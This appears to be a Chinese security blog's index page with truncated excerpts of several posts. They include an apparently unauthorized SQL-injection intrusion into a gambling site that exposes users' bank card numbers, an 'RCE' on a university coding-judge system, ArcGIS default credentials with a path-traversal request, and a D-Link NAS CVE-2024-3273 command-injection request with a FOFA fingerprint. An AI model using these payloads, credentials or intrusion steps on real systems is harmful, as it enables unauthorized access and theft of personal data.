X1ly?S

...

前言公众号的粉丝、一位大师傅发来一个站，问我有没有兴趣试试，我点开一看，哇靠，这不是菠菜嘛，太坏了，必须渗透一下，于是有了这篇小通杀案例 初见端倪简单看了看各个功能点，大部分是一些静态展示内容，有少量的查询数据的功能，于是首先想到打SQL注入 直接来到一处查询功能点 输入admin，有数据正常回显 输入admin’，没有数据回显 抓个包看看 好家伙，狗运来了挡都挡不住，直接SQL报错了 经过手工测试发现没有waf，直接sqlmap跑可以了撒 到此，可以直接拿到整个数据库的全部数据，可以拿到后台管理员表，几个密码哈希值，5K+的姓名，会员号，银行卡号，初始密码，取款密码，资金流水等等数据 但是还不够，于是我进一步尝试getshell 经过漫长的测试发现： 目标是MySQL数据库 通过TP框架报错信息得到了网站根目录绝对路径 没有使用站库分离架构 目录没有写入文件权限 能够通过sqlmap获取sql-shell，但是数据库权限很低，只能执行一些有限的当前数据库的数据查询 对于MySQL，无非就两种常用的方式getshell，into...

前言团队的师傅突然发来一句，”要RCE北大了”，还配上了一个截图，是执行了ls /的全回显结果，卧槽，我直呼牛逼，当时就兴奋了，于是我那天晚上忙(耍)完也去对北大做了信息收集，想去找找看这位师傅所说的可以RCE的站点，后面确实被”RCE”了，觉得有点意思，于是有了这篇文章。 信息收集就不说了，收集下来几千条资产。根据那位师傅的描述，他说那个系统就是类似于”PTA”在线编程系统的，于是结合这个信息，对子域名进行了简单的排查，推测并快速定位到了某一个系统，点开一看，就是在线做一些编程题目的，那么八九不离十就是这个系统了 哟西，可以注册，黑客狂喜(bushi)，注册一个测试账号 直接来到题目做题，因为这里做编程题，不就是能执行我们编写的代码嘛？根据那位师傅的截图，推测肯定是这里编写程序时可以执行系统命令导致的”RCE” 选一个最简单的经典hello word 预期的是这样子，输出一个”hello...

简介ArcGIS 是由 Esri（Environmental Systems Research Institute）开发的地理信息系统（GIS）软件系列，广泛应用于地图制作、空间分析、数据管理和可视化等领域。ArcGIS 提供了一套完整的工具，帮助用户收集、管理、分析和展示地理信息。 默认信息 端口：6080 后台地址：/arcgis/admin/ 后台密码：siteadmin/siteadmin 漏洞任意文件读取1234567GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept:...

简介D-Link NAS（网络附加存储）设备为家庭和小型企业提供了一种便捷的数据存储和共享解决方案 数据存储与备份：支持大容量硬盘，提供集中存储和自动备份功能。 文件共享：支持SMB/CIFS、NFS、FTP等协议，方便多用户访问。 远程访问：通过D-Link的mydlink服务，用户可远程访问和管理NAS数据。 多媒体支持：内置DLNA和UPnP AV媒体服务器，支持流媒体播放。 数据安全：支持RAID、密码保护和加密技术，确保数据安全。 漏洞CVE-2024-3273远程命令执行 fofa指纹：_fid=”hWN+yVVhLzKJaLkd/ITHpA==” payload：system={{base64_enc(cmd)}} 123456GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1Host: x.x.x.xUser-Agent:...

Apache-Spark未授权访问漏洞简介Apache Spark 是一个开源的统一分析引擎，旨在大规模数据处理和高速计算。它最初由加州大学伯克利分校的 AMPLab 开发，并于2010年开源，随后在2013年进入Apache软件基金会孵化器，并在2014年成为顶级项目。Spark 以其在内存中处理数据的能力而闻名，可以大幅提高大数据分析的速度和效率。 漏洞原理Apache Spark 未授权访问漏洞主要是由于 Spark 的默认配置或不安全配置导致未经授权的用户能够访问 Spark 的 Web UI 和 REST...

审计过程 首先来到⽂件 app\system\user\admin\parameter.class.php 下的 doDelParas 方法 123456789101112131415161718192021public function doDelParas(){ global $_M; if (!isset($_M['form']['id'])) { $this->error(); } $data = $_M['form']['id']; $module = $this->module; foreach ($data as $value) { if (!$value) { continue; } $this->database->del_by_id($value); ...

strpos1strpos(string $haystack, string $needle, int $offset = 0): int|false 参数 haystack 在该字符串中进行查找。 needle 要搜索的字符串。 offset 如果提供了此参数，搜索会从字符串该字符数的起始位置开始统计。 如果是负数，搜索会从字符串结尾指定字符数开始。 返回值返回 needle 存在于 haystack 字符串起始的位置(独立于 offset)。 同时注意字符串位置是从0开始，而不是从1开始的。如果没找到 needle，将返回 false。 警告 此函数可能返回布尔值 false，但也可能返回等同于 false 的非布尔值。应使用 [=== 运算符]来测试此函数的返回值。 Demo分析 很简单的例子。本次漏洞是开发者对 strpos...

《无尽终章》 当BurpSuite被抛弃于回收站，SQLMap被渗透遗忘。当IPv6同水一起枯竭，HTTP 9和星际飞船我无法想象。若Github还有一息尚存，我的博客将沦为古老的笑话。当师傅的徒弟的徒弟成为师傅死去，思维Fuzz于宇宙，cmd一般漆黑沉默，而我的尸体，又反复腐烂于哪段虚拟的时光?

class-exists1class_exists(string $class, bool $autoload = true): bool $class 为类的名字，在匹配的时候不区分大小写。默认情况下 $autoload 为 true ，当 $autoload 为 true 时，会自动加载本程序中的 __autoload 函数；当 $autoload 为 false 时，则不调用 __autoload 函数。 也就是说class_exists接收的第一个参数class，在默认$autoload为true时，会自动传递给__autoload 函数加载 参数 class 类名。名称以不区分大小写的方式匹配 autoload 如果尚未加载，是否自动加载 返回值如果 class 是已经定义的类，则返回 **true**，否则返回 false 示例1234567<?php// 在尝试使用前检查类是否存在if (class_exists('MyClass')) { $myclass = new...